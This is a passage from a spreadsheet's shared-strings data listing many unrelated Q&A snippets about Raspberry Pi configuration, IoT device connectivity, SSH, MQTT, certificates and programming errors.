I expected the RaspberryPi to login and finish, but instead it ended up saying 'login incorrect'.</t>
  </si>
  <si>
    <t>Now I have the private key, public key certificate and endpoint URL but how to use it in swift.</t>
  </si>
  <si>
    <t>Create /etc/init/myjob.conf
vi /etc/init/myjob.conf
with content like the following
description     "my job" 
start on startup
task
exec /path/to/my/script.sh
Depending on what you do with the ssh connection, if it needs to stay open over the entire up time of the device, you will need to use some more trickery however (ssh connections are autoclosed after a period of inactivity).</t>
  </si>
  <si>
    <t>I can get the module to send an invalid post (simply add a space in front of the POST in the command), and I get a response back from a web server 400, telling me it is an invalid http request.</t>
  </si>
  <si>
    <t>This works fine for few devices and the get method returns valid client token, but then after 10-12 devices I'm getting null as response of the get method and thus the status event is also not fired for the devices.</t>
  </si>
  <si>
    <t>Using Agent Enroll API to create the device where passing status as CREATED 
in Enrollment info, but WSO2 server default uses ACTIVE status.</t>
  </si>
  <si>
    <t>To
proceed, type the following command at the prompt and follow the instructions:
t authorize
This command will direct you to a URL where you can sign-in to Twitter,
authorize the application, and then enter the returned PIN back into the
terminal.</t>
  </si>
  <si>
    <t>The  function returns pointers to the string you're tokenizing, the local array response in your case.</t>
  </si>
  <si>
    <t>To access it from the public mobile network (from outside your own local network), you would have to have a public IP address that was routed to your server from outside your local network.</t>
  </si>
  <si>
    <t>You could put a line in your python script on your PI like this:
If you use RSA keys for authentication, the PI will connect without a prompt for authentication, and run the command as .</t>
  </si>
  <si>
    <t>A Safe navigation operator used to test for null before performing a member access () or index (?</t>
  </si>
  <si>
    <t>*)$ /index.php/$1 [L]
#Checks to see if the user is attempting to access a valid file,
#such as an image or css document, if this isnt true it sends the
#request to index.php
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
#This last condition enables access to the images and css folders, and the robots.txt file
RewriteCond $1 !^(index\.php|images|robots\.txt|css)
RewriteRule .</t>
  </si>
  <si>
    <t>Then change the following line in the file /boot/config.txt at the bottom of the file from:
enable_uart=0
to
enable_uart=1
Disable the ModemMonitor service by running the following command as root:
systemctl disable ModemManager.service
Then add youself to the dialout group, just to be sure you have the required permissions on the serial port:
adduser pi dialout
That should give you unrestricted proper access to the serial port.</t>
  </si>
  <si>
    <t>To update the local package index with the latest changes made in repositories, type the following:
sudo apt-get update
Upgrade Packages: Over time, updated versions of packages currently installed on your computer may become available from the package repositories (for example security updates).</t>
  </si>
  <si>
    <t>Alternatively, it is safe to comment out the call to that function in decode_target_create.cc since SbImageIsDecodeSupported() always returns false for raspi (see image_is_decode_supported.cc), so decode targets should never be created / destroyed on the platform.</t>
  </si>
  <si>
    <t>Avoid placing code that is executed on startup outside of if __name__ == '__main__': 
From the docs:
   Safe importing of main module
   One should protect the entry point of the program by using if __name__ == '__main__':  
Added join() after working = False, this guaranteed the thread has terminated befor starting it again.</t>
  </si>
  <si>
    <t>In JavaScript, you can use the following method to get the device id:
The index.js looks like this:
The log is:
2018-07-18T08:55:17.122 [Info] systemProperties { 'iothub-connection-device-id': 'device1',
  'iothub-connection-auth-method': '{"scope":"device","type":"sas","issuer":"iothub","acceptingIpFilterRule":null}',
  'iothub-connection-auth-generation-id': '636627421237258770',
  'iothub-enqueuedtime': 2018-07-18T08:55:16.193Z,
  'iothub-message-source': 'Telemetry',
  'x-opt-sequence-number': 48574,
  'x-opt-offset': '28334352',
  'x-opt-enqueued-time': 2018-07-18T08:55:17.100Z,
  enqueuedTimeUtc: 2018-07-18T08:55:17.100Z,
  sequenceNumber: 48574,
  offset: '28334352',
  'content-type': 'JSON' } of type object
2018-07-18T08:55:17.122 [Info] DeviceId:  device1
2018-07-18T08:55:17.122 [Info] Function completed (Success, Id=709739ed-7b14-4ac2-821f-df2a68c601ef, Duration=2ms)</t>
  </si>
  <si>
    <t>Go into your home directory and add:
export PATH=$PATH:$HOME/raspberrypi/tools/arm-bcm2708/gcc-linaro-arm-linux-gnueabihf-raspbian/bin
to the end of the file named ~/.bashrc
Now you can either log out and log back in (i.e.</t>
  </si>
  <si>
    <t>I thought that the problem is with running PuTTy directly in PHP and I do some changes and create .bat file with the following content:
echo off
putty -ssh pi@%1 -pw %2 -m %3
I start this batch script like this:
exec("D:\workspace\CPS\public\ssh\restart.bat 192.168.0.12 myPassword D:\workspace\CPS\public\ssh\restart.txt");
...but result is the same.</t>
  </si>
  <si>
    <t>I have this simple Sinatra server:
and the client does nothing fancy (some code removed for readability):
the code works and the GET request with some query parameters arrive at the server, but the server always prints:
HTTP parse error, malformed request (): #&lt;Puma::HttpParserError: 
Invalid HTTP format, parsing fails.&gt;
My googling tells me that this is something that I could get if I use an URL that starts with "https://", but I am not doing that.</t>
  </si>
  <si>
    <t>To make your test work you need to use the following commands,
Subscribe
mosquitto_sub -h "localhost" -p "1883" -t "kapua-sys/mosquitto_pub/my/test/topic" -u "kapua-sys" -P "kapua-password" -i "mosquitto_sub"
Publish
mosquitto_pub -h "localhost" -p "1883" -t "kapua-sys/mosquitto_pub/my/test/topic" -m "My test message" -u "kapua-broker" -P "kapua-password" -i "mosquitto_pub"
For the Kura example publisher, I don't know where could be the problem, due to lack of info.</t>
  </si>
  <si>
    <t>When you run cgi scripts on the command line to test them, try running them like this
./test1.py
not
python test1.py
and that will help make sure that the interpreter and permissions are set up correctly.</t>
  </si>
  <si>
    <t>preg_replace_callback replaces the older (and insecure)  flag in preg_replace, where PHP would eval the replace string and execute the PHP contained inside.</t>
  </si>
  <si>
    <t>So
self.__tracer.info()
returns True if info level messages will be logged.</t>
  </si>
  <si>
    <t>To do so, edit the file
/storage/.config/autostart.sh
on the openelec and add following
ssh &lt;server&gt; 'sshfs root@&lt;openelec&gt;:/storage /usernamefolder'
This will obviously need sshfs on the remote server and you need to replace the values in the &lt;&gt; brackets.</t>
  </si>
  <si>
    <t>After installation of the package using PIP and Python v2.7, I get an 
This is what I typed into PYTHON IDLE v2.7:  
And this is what was printed on the console:  
Warning (from warnings module):
File "C:\PROGS\Python27\lib\site-packages\requests\packages\urllib3\connectionpool.py", line 789
InsecureRequestWarning)
InsecureRequestWarning: Unverified HTTPS request is being made.</t>
  </si>
  <si>
    <t>token = {
      'iat': datetime.datetime.utcnow(),
      'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes=60),
      'aud': project_id
  }
  with open(private_key_file, 'r') as f:
    private_key = f.read()
  print('Creating JWT using {} from private key file {}' .format(algorithm, private_key_file))
  return jwt.encode(token, private_key, algorithm=algorithm)
def error_str(rc):
  """Convert a Paho error to a human readable string."""</t>
  </si>
  <si>
    <t>python script should now run on startup
Auto Login Setup(to execute script without any intervention from user)
Open /etc/inittab
sudo nano /etc/inittab
Find this line
1:2345:respawn:/sbin/getty 115200 tty1
Add a # character to the beginning of the line to disable it so it looks like
#1:2345:respawn:/sbin/getty 115200 tty1 
Under that line, add the following:
1:2345:respawn:/bin/login -f pi tty1 /dev/tty1 2&gt;&amp;1
where pi is the username.</t>
  </si>
  <si>
    <t>In the sense I want to use the same Public/Private Key pair for all devices registering to a registry but be able to pass device information on to pubsub via mqtt/http with unique device information like name or id.</t>
  </si>
  <si>
    <t>This is using a credentials file rather than specifying the username/password in the unit itself; a credentials file would look like:
username=test
password=test
You could just replace the credentials option with username= and password=.</t>
  </si>
  <si>
    <t>The problem is that my verify function is returning 0 twice when it's false, why does it do that and if true it returns 1 and 0 which is weird.</t>
  </si>
  <si>
    <t>I have solved this by removing the command line arguments (as shown in screen -r "lily_telemetry" -X stuff $'python3 lily_telemetry.py --project_id=$project --registry_id=$registry --device_id=$device --private_key_file=rsa_private.pem --algorithm=RS256 --ca_certs=roots.pem\n'), which called the shell variables ($project etc), and instead using configparser within the python code to load these variables from a .ini file</t>
  </si>
  <si>
    <t>In manifest declare internet permission outside application tag : 
In build.gradle file add this line inside dependencies: implementation 'com.android.volley:volley:1.0.0'
Create a java file named VolleySingleton and copy the file contents from the file in github just don't copy the package name.</t>
  </si>
  <si>
    <t>gateway default_gateway_from_step_1
      dns-nameservers 8.8.8.8
      wpa-ssid YOUR_NETWORK_SSID
      wpa-psk YOUT_NETWORK_PASSKEY
  allow-hotpug wlan1
  iface wlan1 inet manual
      wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf
ctrl+x and save the file, yes on overwrite
sudo service networking restart
The pi should do some things and restart okay.</t>
  </si>
  <si>
    <t>I'm making an IoT client on iOS, and I'm having trouble finding the following methods that exist on Android:
I have a Certificate and Private key in pem format, and I need to generate a keystore (keychain on iOS)
Are there any similar methods in the iOS SDK?</t>
  </si>
  <si>
    <t>Private keys installed via this Intent will be accessible via choosePrivateKeyAlias(Activity, KeyChainAliasCallback, String[], Principal[], String, int, String) while Certificate Authority (CA) certificates will be trusted by all applications through the default X509TrustManager.</t>
  </si>
  <si>
    <t>For communications resources,
  the dwCreationDisposition parameter must be OPEN_EXISTING, the
  dwShareMode parameter must be zero (exclusive access), and the
  hTemplateFile parameter must be NULL.</t>
  </si>
  <si>
    <t>Had to add codesFoundOnSD.trim(); to remove any extra or hidden text or a carriage return...</t>
  </si>
  <si>
    <t>You either have to pass in a unique string per a client to AWSIoTMQTTClient() or an empty string.</t>
  </si>
  <si>
    <t>The encryption key is called the public key and the decryption key is called the private key.</t>
  </si>
  <si>
    <t>Windows Runtime applications can be written using any combinations of the three major runtimes - native, .NET and JS as long as these components are exposed across ABI (application binary interface) following rules such as - public classes need to be sealed, method arguments and return types need to be WinRT types themselves or have direct projection to those (such as  with System.Uri or Platform::String and System.String or many of the other basic types having counterparts in different language runtimes).</t>
  </si>
  <si>
    <t>jsoup can be used to ...
scrape and parse HTML from a URL, file, or string
find and extract data, using DOM traversal or CSS selectors
manipulate the HTML elements, attributes, and text
clean user-submitted content against a safe white-list, to prevent XSS attacks
output tidy HTML
jsoup is designed to deal with all varieties of HTML found in the wild; from pristine and validating, to invalid tag-soup; jsoup will create a sensible parse tree.</t>
  </si>
  <si>
    <t>On my side I uploaded the csa certificate on the ESP8266 though SPIFFS and correctly set all parameters and private key string in 'ciotc_config.h'.</t>
  </si>
  <si>
    <t>User-level commands that run for any user when they log in (unlike rc.local, which runs before login) can be put into /etc/bash.bashrc.</t>
  </si>
  <si>
    <t>(Admin password will be required)
Restart BlueJ (the Java IDE i used), compile the code, and right click on the "mouse" module -&gt; void main (string[] args) -&gt; "OK".</t>
  </si>
  <si>
    <t>So you can put a comment # in front of the Banner line in sshd_config and the ssh_banner.sh is still sourced under normal login.</t>
  </si>
  <si>
    <t>In .NET
Dictionary&lt;TKey, TValue&gt;.TryGetValue: returns true or false depending on whether the provided key was found and a value as an out parameter.</t>
  </si>
  <si>
    <t>The Provider maintains references to all calls until they move into the Call.INVALID state.</t>
  </si>
  <si>
    <t>However, I keep getting an error message saying "unable to get local issuer certificate"
I have created my device (there is no real one, just mimicking), registered it in AWS IoT, created the certificate, private and public key, added a policy to the certificate.</t>
  </si>
  <si>
    <t>if you get it working at this point, you will want to try configuring the /etc/network/interfaces file to use a static IP address
- Comment out the DHCP lines
- Example (make sure to get the columns lined up and order the same)   
auto eth0 
iface eth0 inet static 
       address 192.168.69.97 
       netmask 255.255.255.0 
       broadcast 192.168.69.255 
       network 192.168.69.0 
       gateway 192.168.69.1
if that doesn't work then perhaps you ISP (U-Verse) doesn't like you to use static IP address.</t>
  </si>
  <si>
    <t>I use this method on my Raspberry Pi 3 devices:
Google account setting
Login to your gmail account
Go to: Settings -&gt; Accounts and Import -&gt; Other Google Account settings
Go to: Personal info &amp; privacy -&gt; Account overview
Go to: Sign-in &amp; security -&gt; Connect apps &amp; sites
Set option Allow less secure apps to ON
Install SSMTP
Save original conf file
sudo mv /etc/ssmtp/ssmtp.conf /etc/ssmtp/ssmtp.conf.bak
Create new conf file (with vi, or some other text editor)
sudo vi /etc/ssmtp/ssmtp.conf
file content
Secure conf file
sudo groupadd ssmtp
sudo chown :ssmtp /etc/ssmtp/ssmtp.conf
If you have error on this step like ''cannot access'' ... you must find ssmtp file and use that path: sudo find / -name "ssmtp"
sudo chown :ssmtp /usr/sbin/ssmtp
sudo chmod 640 /etc/ssmtp/ssmtp.conf
sudo chmod g+s /usr/sbin/ssmtp
Sending mail from (only one) command line
echo "This is a test" | ssmtp recipient.address@some_domain.com
or
printf "To: recipient.address@some_domain.com\nFrom: RaspberryPi3\nSubject: Testing send mail from Raspberry\n\nThis is test.</t>
  </si>
  <si>
    <t>If both exist, both are
       imported, and $HOME/.ltrace.conf is consulted before
       /etc/ltrace.conf.</t>
  </si>
  <si>
    <t>Replace pi with the correct user that calls the script (replacing with ALL should allow all users to run mystepper.py with root privileges - have not tested this).</t>
  </si>
  <si>
    <t>Increment the version number of
  the package to be registered, or remove the old package for every user
  on the system before registering this package.</t>
  </si>
  <si>
    <t>I'm on Android 6.0.1 (Nexus 5) and testing beacon montoring via the Altbeacon library 2.9.1, and while testing the device at home near the beacon (a few rooms away) I get multiple entry/exit callbacks.</t>
  </si>
  <si>
    <t>Some frequent types of test environments include (these definitions will vary at different companies):
Integration Test: First environment where individual programs are combined together to ensure interoperability
System Test: Where complete sets of well-defined test cases are run to exercise all business requirements
User Acceptance Test: Where end-users test out (new) functionality to ensure it meets their goals and data/results are valid
Performance Test: Testing that stresses the system with high volumes of data and transactions.</t>
  </si>
  <si>
    <t>UPDATE: 31-Oct-2014
As suggested by LeeDavidPainter, I included the SpongyCastle 1.51.0 JAR and added this line at the top:
Security.insertProviderAt(new org.spongycastle.jce.provider.BouncyCastleProvider(), 1);
I'm now getting a different exception on the same line:
net.schmizz.sshj.transport.TransportException
 net.schmizz.sshj.common.SSHException
  net.schmizz.sshj.common.SSHRuntimeException
   java.security.GeneralSecurityException: java.security.spec.InvalidKeySpecException: key spec not recognised
    java.security.spec.InvalidKeySpecException: key spec not recognised
Also note I tried the following line as well, with the same result:
Security.addProvider(new org.spongycastle.jce.provider.BouncyCastleProvider());
I have another app on my phone which is basically doing exactly what I want to achieve - its called RaspberryPiController - it connects to your RPi over SSH with username and password auth.</t>
  </si>
  <si>
    <t>I am getting the following error:
crypto.js:153
var ret = this._handle.final();
Error: error:0606506D:digital envelope routines:EVP_DecryptFinal_ex:wrong final block length
          at Error (native)
          at Decipheriv.Cipher.final (crypto.js:153:26)
          at decrypt (/home/pi/rampion/nodejs/test2.js:22:19)
          at Object.</t>
  </si>
  <si>
    <t>sendCommandCheckAck(pn532_packetbuffer, 4))
        return false;
    // read data packet
    readspidata(pn532_packetbuffer, 8);
    return  (pn532_packetbuffer[5] == 0x15);
}
uint32_t PN532::authenticateBlock(uint8_t cardnumber /*1 or 2*/,uint32_t cid /*Card NUID*/, uint8_t blockaddress /*0 to 63*/,uint8_t authtype/*Either KEY_A or KEY_B */, uint8_t * keys) {
    pn532_packetbuffer[0] = PN532_INDATAEXCHANGE;
    pn532_packetbuffer[1] = cardnumber;  // either card 1 or 2 (tested for card 1)
    if(authtype == KEY_A)
    {
        pn532_packetbuffer[2] = PN532_AUTH_WITH_KEYA;
    }
    else
    {
        pn532_packetbuffer[2] = PN532_AUTH_WITH_KEYB;
    }
    pn532_packetbuffer[3] = blockaddress; //This address can be 0-63 for MIFARE 1K card
    pn532_packetbuffer[4] = keys[0];
    pn532_packetbuffer[5] = keys[1];
    pn532_packetbuffer[6] = keys[2];
    pn532_packetbuffer[7] = keys[3];
    pn532_packetbuffer[8] = keys[4];
    pn532_packetbuffer[9] = keys[5];
    pn532_packetbuffer[10] = ((cid &gt;&gt; 24) &amp; 0xFF);
    pn532_packetbuffer[11] = ((cid &gt;&gt; 16) &amp; 0xFF);
    pn532_packetbuffer[12] = ((cid &gt;&gt; 8) &amp; 0xFF);
    pn532_packetbuffer[13] = ((cid &gt;&gt; 0) &amp; 0xFF);
    if (!</t>
  </si>
  <si>
    <t>modern versions of Raspian come with avahi/bonjour/zeroconf installed
Try using its machine name with ".local" appended, assuming my machine is called "billg-testbox", the following should work:
ssh pi@billg-testbox.local
The latest versions of Raspian also allow you to create a file named "ssh" in your boot directory to automatically enable SSH.</t>
  </si>
  <si>
    <t>{
  "IsEncrypted": false,
  "Values": {
    "AzureWebJobsStorage": "UseDevelopmentStorage=true",
    "FUNCTIONS_WORKER_RUNTIME": "dotnet",
    "iotHubName": "iot-hub",
    "AzureSignalRConnectionString": "connection string value",
    "MSDEPLOY_RENAME_LOCKED_FILES": 1
  },
  "Host": {
    "LocalHttpPort": 5181,
    "CORS": "*"
  }
}
I am not sure what I am missing here.</t>
  </si>
  <si>
    <t>Which allowed me to login automatically and load the desktop (startX)
For Auto Login:
Scroll down to:
and change to: (comment it out)
#1:2345:respawn:/sbin/getty 115200 tty1
Under that line add: 
1:2345:respawn:/bin/login -f pi tty1 &lt;/dev/tty1 &gt;/dev/tty1 2&gt;&amp;1
and Save.</t>
  </si>
  <si>
    <t>Public-key cryptography, or asymmetric cryptography, is any cryptographic system that uses pairs of keys: public keys that may be disseminated widely paired with private keys which are known only to the owner.</t>
  </si>
  <si>
    <t>Can anybody please tell me why am I getting this error:
When I tried to run this python script
I have registered my device and replaced the connection string also, 
I have installed 1)azure-iothub-service-client and 2)azure-iothub-device-client packages
Am I missing any packages?</t>
  </si>
  <si>
    <t>Code within a try/catch block is referred to as protected code, and the syntax for using try/catch looks like the following:
You can provide multiple catch statements to catch different type of exceptions in case your try block raises more than one type of exception.</t>
  </si>
  <si>
    <t>[enter image description here][4]][4]
It says that these are the related codes that caused the error (which shown in blue color in the previous image:
IotCorePasswordGenerator.java:47
return Base64.decode(inputToString(inStream), Base64.DEFAULT);
IotCorePasswordGenerator.java:34
 byte[] privateKeyBytes = decodePrivateKey(resources, privateKeyRawFileId);
IotCoreCommunicator.java:135
connectOptions.setPassword(passwordGenerator.createJwtRsaPassword());
IotCoreCommunicator.java:101
clientConnect();
MainActivity.java:58
communicator.connect();
Update 2
I deleted the statement "-----BEGIN PRIVATE KEY-----" and the statement "------END PRIVATE KEY-----" and the error "bad base 64" is gone, Now there is another error which is "broken pipe" as shown in image below, when I reopen Android Studio and rebuild the project this error "broken pipe" removed, and when I run the project again it comes back again.</t>
  </si>
  <si>
    <t>):
2018-01-24 22:51:00,078 - selenium.webdriver.remote.remote_connection 480 -DEBUG - POST http://127.0.0.1:45413/session {"capabilities": {"alwaysMatch": {"acceptInsecureCerts": true, "browserName": "firefox", "moz:firefoxOptions": {"args": ["headless"]}}, "firstMatch": [{}]}, "desiredCapabilities": {"acceptInsecureCerts": true, "browserName": "firefox", "moz:firefoxOptions": {"args": ["headless"]}}}
2018-01-24 22:51:00,944 - selenium.webdriver.remote.remote_connection 567 -DEBUG - Finished Request {"value":{"error":"unknown error","message":"Process unexpectedly closed with status: 1","stacktrace":"stack backtrace:\n   0:   0x55d797 - backtrace::backtrace::trace::hc4bd56a2f176de7e\n   1:   0x55d8ff - backtrace::capture::Backtrace::new::he3b2a15d39027c46\n   2:   0x4b7f4b - webdriver::error::WebDriverError::new::ha0fbd6d1a1131b43\n   3:   0x4bcb57 - geckodriver::marionette::MarionetteHandler::create_connection::hf0532ddb9e159684\n   4:   0x4a14cb - &lt;webdriver::server::Dispatcher&lt;T, U&gt;&gt;::run::h2119c674d7b88193\n   5:   0x47fcbf - std::sys_common::backtrace::__rust_begin_short_backtrace::h21d98a9ff86d4c25\n   6:   0x4871cf - std::panicking::try::do_call::h5cff0c9b18cfdbba\n   7:   0x606237 - panic_unwind::__rust_maybe_catch_panic\n                at /checkout/src/libpanic_unwind/lib.rs:99\n   8:   0x4999e7 - &lt;F as alloc::boxed::FnBox&lt;A&gt;&gt;::call_box::h413eb1d9d9f1c473\n   9:   0x6000d3 - alloc::boxed::{{impl}}::call_once&lt;(),()&gt;\n                at /checkout/src/liballoc/boxed.rs:692\n                 - std::sys_common::thread::start_thread\n                at /checkout/src/libstd/sys_common/thread.rs:21\n                 - std::sys::imp::thread::{{impl}}::new::thread_start\n                at /checkout/src/libstd/sys/unix/thread.rs:84"}}
2018-01-24 22:51:00,947 - main.main 38 -WARNING - Problem (Message: Process unexpectedly closed with status: 1
Here is the crux of the error (interesting that it is reported as a DEBUG).</t>
  </si>
  <si>
    <t>Later, I created X.509 certificate from PEM string and the RsaCrtKeySpec object from the private key string in the keypair object.</t>
  </si>
  <si>
    <t>* &lt;p&gt;
 * By default this method will return an empty username/password combo, 
 * but it can be overriden to prompt the user for a username and/or 
 * password.</t>
  </si>
  <si>
    <t>I was passing the the certificateID string to the .connect method , but then realised that above the .connect method definition it mentions that: "the certificateID must be stored in the KeyChain".</t>
  </si>
  <si>
    <t>There is yet another problem in:
pthread_barrier_init(&amp;mythread, NULL, unlitToLit);
As the third argument is count which is used to specify how many threads should call pthread_barrier_wait for barrier to unlock.</t>
  </si>
  <si>
    <t>Install RubyGems with Bundler or command line
Using private Gems with Bundler is easy, just add your Gemfury Repo URL to the project's Gemfile.</t>
  </si>
  <si>
    <t>If I just start pianobar from the command line (not from my Python program), it logs in automatically using info from the config file (Email, Password, TLS_fingerprint).</t>
  </si>
  <si>
    <t>Some extra information:
This is the mosquitto_pub command which currently works:
mosquitto_pub -h [hostname] -p [port] -t [topic] -m "" -u [username] -P [password] --cafile cert.cer  -i [deviceName]
We have been provided with the hostname, port, topic, username (which is a long string containing slaches, dashes and equality operators), password (which is also a long string containing spaces, percentage signs and equality operators) and a certificate file.</t>
  </si>
  <si>
    <t>In a docker-compose.yml, that would look something like:
FG:
    privileged: true
    network_mode: "host"
    pid: "host"
    depends_on:
        - "mosquitto"
        - "mongoDB"
    volumes:
        - "/home/pi:/home/pi"
        - "/boot:/boot"
        - "/run/dbus:/run/dbus"
        - "/run/systemd:/run/systemd"
    image: "test:latest"
    entrypoint: /app/docker-entrypoint.sh
    restart: unless-stopped</t>
  </si>
  <si>
    <t>You can do some of the following
make sure the SD card is properly seated 
remove old log files 
remove unnecessary packages 
remove unbessary files 
get a bigger SD / micro SD card and install the OS
Restart the raspberry pi (so services have enough to start up without errors )
Login and run startx</t>
  </si>
  <si>
    <t>EDIT - I'm new to Lua, and was thinking about the error "unprotected call"...</t>
  </si>
  <si>
    <t>After the encrypt function is called a second time the resulting decryptText should be the same as the original plain-text, however, at the moment plainText =/= decryptText.</t>
  </si>
  <si>
    <t>Note that although this file is called a trust store to distinguish it from the keystore that holds the private keys, it uses the jks format and file name extension.</t>
  </si>
  <si>
    <t>After this im get the same error again
Sorry for my bad english
`RRChatServer.exe
Unhandled Exception: System.EntryPointNotFoundException:
  CreateSemaphore   at (wrapper managed-to-native)
  MySql.Data.Common.Semaphore:CreateSemaphore
  (MySql.Data.Common.SECURITY_ATTRIBUTES&amp;,int,int,string)   at
  MySql.Data.Common.Semaphore..ctor (Int32 initialCount, Int32
  maximumCount) [0x00000] in :0   at (wrapper
  remoting-invoke-with-check) MySql.Data.Common.Semaphore:.ctor
  (int,int)   at MySql.Data.MySqlClient.MySqlPool..ctor
  (MySql.Data.MySqlClient.MySqlConnectionString settings) [0x00000] in
  :0   at
  MySql.Data.MySqlClient.MySqlPoolManager.GetPool
  (MySql.Data.MySqlClient.MySqlConnectionString settings) [0x00000] in
  :0   at MySql.Data.MySqlClient.MySqlConnection.Open
  () [0x00000] in :0 [ERROR] FATAL UNHANDLED
  EXCEPTION: System.EntryPointNotFoundException: CreateSemaphore   at
  (wrapper managed-to-native)
  MySql.Data.Common.Semaphore:CreateSemaphore
  (MySql.Data.Common.SECURITY_ATTRIBUTES&amp;,int,int,string)   at
  MySql.Data.Common.Semaphore..ctor (Int32 initialCount, Int32
  maximumCount) [0x00000] in :0   at (wrapper
  remoting-invoke-with-check) MySql.Data.Common.Semaphore:.ctor
  (int,int)   at MySql.Data.MySqlClient.MySqlPool..ctor
  (MySql.Data.MySqlClient.MySqlConnectionString settings) [0x00000] in
  :0   at
  MySql.Data.MySqlClient.MySqlPoolManager.GetPool
  (MySql.Data.MySqlClient.MySqlConnectionString settings) [0x00000] in
  :0   at MySql.Data.MySqlClient.MySqlConnection.Open
  () [0x00000] in :0`</t>
  </si>
  <si>
    <t>The GSM Server only has an SSL Client 
I am in control of both devices
Commands are delivered by a text string
Only the webserver has SSL
My C skills are decent at best 
I need the SSL Server to be able to send commands to the Arduino Device, but I want these commands to be secured (The arduino device opens and closes valves in a building).</t>
  </si>
  <si>
    <t>Run the following command as root (replace  with a real IP address):
ip addr add x.x.x.x dev eth0
Verify that the IP address was set properly with ifconfig
Run adb connect x.x.x.x or adb connect Android.local
The static IP address will only stick as long as the Ethernet link is active.</t>
  </si>
  <si>
    <t>The error is
PANIC: unprotected error in call to Lua API (init.lua:27: attempt to concatenate global '_off' (a nil value))
Help me understand the complete meaning of the program.</t>
  </si>
  <si>
    <t>The condition is that this circuit is attached to a gate, if user 1 lets say knows pass1, after entering the pass the gate will unlock for 10 seconds and the pass1 becomes invalid i.e.</t>
  </si>
  <si>
    <t>If you look at the doc for the  function you will see it can take an argument called auth which holds the username/password to connect to the broker
auth
a dict containing authentication parameters for the client:
auth = {username:, password:}
Username is required, password is optional and will default to None if
  not provided.</t>
  </si>
  <si>
    <t>References:
Text segmentation - Wikipedia
Related Tags:
text-processing
tokenize</t>
  </si>
  <si>
    <t>Object unknown0 = listOfUnknown.get( 0 );
// Compiler error:
//  The wildcard prevents us from passing arguments
//  to any method that once accepted String.</t>
  </si>
  <si>
    <t>Smartcards used for cryptographic functions such as identity verification, signing, and decryption are usually designed so that the cards can generate their own cryptographic public/private key pairs, such that the private key cannot be removed or exported from the card.</t>
  </si>
  <si>
    <t>So I tried it out by myself using this configuration command:
./configure --without-npm --without-ssl --without-snapshot --fully-static
The --fully-static option is self explaining and the other options are documented.</t>
  </si>
  <si>
    <t>According to the literature at Arduino's Site:
Concatenating in a constructor "gives unpredictable results because 'auth_raw' never got an initial value before you started concatenating different data types.</t>
  </si>
  <si>
    <t>Similarly to public packages, the standard npm-cli tool is utilized to publish and consume private modules.</t>
  </si>
  <si>
    <t>One of the recent commit messages says that device twins over AMQP were added.</t>
  </si>
  <si>
    <t>Next I add an entry to fstab for the drive:
sudo nano /etc/fstab
I add another entry to the file like this:
/dev/sdb1    /media/HD2    vfat    permissions,defaults,auto    0    0
Use vfat for fat32 file systems and ntfs if the drive is that.</t>
  </si>
  <si>
    <t>To provide this access, I've created a Lambda function that calls  to create temporary STS keys.</t>
  </si>
  <si>
    <t>I have tried a few different variations including:
subprocess.call("FRAMEBUFFER=/dev/fb0 startx -- :1", shell=True);
Starts but doesn't use console1
Changes ownership of /home/pi/.Xauthority file so next boot fails.</t>
  </si>
  <si>
    <t>The visibility of the two methods may be different; it is often useful for the accessor to be public while the mutator remains protected, package-private or internal.</t>
  </si>
  <si>
    <t>I have been trying to do the upload using AVRdude via the command line (I even tried the "hacky" solution in the last comment of the above thread), but to no avail.</t>
  </si>
  <si>
    <t>I would also verify the validateKnock() method and make sure it isn't always returning true - maybe step through it by hand with some sample code.</t>
  </si>
  <si>
    <t>References
JavaScript: The Function() Constructor
Javascript Function() Constructor Does Not Create A Closure
Avoiding security-related JavaScript errors: Function Constructor</t>
  </si>
  <si>
    <t>The most important element of public key encryption is that the public and private keys are related in such a way that only the public key can be used to encrypt a message and only the matching private key can be used to decrypt it.</t>
  </si>
  <si>
    <t>When the call is received into the Cloud, the cloud recognises the call is for your account and then passes the call to the UAS on your server.</t>
  </si>
  <si>
    <t>What I want is for the String^ value returned by ReadExisting() method to be encoded in Windows-1252 encoding format so it can identify characters with values from 127-255.</t>
  </si>
  <si>
    <t>librsync provides three main operations:
generate a signature S from a file A
generate a delta D from S and a new file A1
apply D to A to reconstruct A1
The librsync source package also provides the  command-line interface.</t>
  </si>
  <si>
    <t>CallKit can be used to
let users view and answer incoming VoIP calls on the lock screen
manage contacts from VoIP calls in the Phone apps Favorites and Recents views
call blocking
caller identification
Quick References
API Reference
Enhancing VoIP Apps with CallKit (WWDC 2016 Video)
SpeakerBox (Sample Code)</t>
  </si>
  <si>
    <t>Call getPrivateKey(Context, String) and getCertificateChain(Context, String) to retrieve the credentials to return to the corresponding X509KeyManager callbacks.</t>
  </si>
  <si>
    <t>I am compiling some code that defines an emun as protected, like this
I would like to use that enum in my method like this, this method is now public within the same class
However while compiling error saying
../../MPU9250.h: In function 'void initMovementDetected()':
../../MPU9250.h:196:7: error: 'MPU9250::A_scale AFS_8G' is protected
       AFS_8G,
       ^
../../nRF52.cpp:49:31: error: within this context
  mpu9250.setAccScale(MPU9250::AFS_8G);
Why is this?</t>
  </si>
  <si>
    <t>rsa_private_pkcs8) to app/src/main/res/raw/privatekey.txt
Next, you can load the key used to calculate your JWT as:
One final note, it appears that you're referencing a file that is not in pkcs8 format, which will cause issues with Java.</t>
  </si>
  <si>
    <t>pfx is a file format containing public key together with the private key for encryption and chain of trust certificates attached to the public key if such a chain exists.</t>
  </si>
  <si>
    <t>Because all the certificates in the trust store are the public portion of the certificate pairs they represent, the security requirements for this file are significantly lower than those for private certificates and keys.</t>
  </si>
  <si>
    <t>But for private methods -- which get called only by other code, and so can expect certain pre-conditions -- the input parameters can be checked with Code Contracts.</t>
  </si>
  <si>
    <t>guaranteeing failure) when invalid methods/functions are called
type safety
Comparison of strong/weak to static/dynamic (they are not the same!</t>
  </si>
  <si>
    <t>Resulting file sizes:
./configure --without-npm --without-snapshot --fully-static around 13 MB (or 13565532 bytes)
with --without-ssl around 10 MB (10403783 bytes)
If someone has ideas to reduce the resulting file size further I would be glad to read them in the comments.</t>
  </si>
  <si>
    <t>This function returns the encoded string on success, or FALSE on failure.</t>
  </si>
  <si>
    <t>In my mvc application I'm calling one async method, on button click, which will register device into iot hub.</t>
  </si>
  <si>
    <t>Your isDetected method returns a boolean.</t>
  </si>
  <si>
    <t>You can execute a command from bash without actually logging into the other computer by placing the command after the shh command:
Would create the text file ~/wat.txt.</t>
  </si>
  <si>
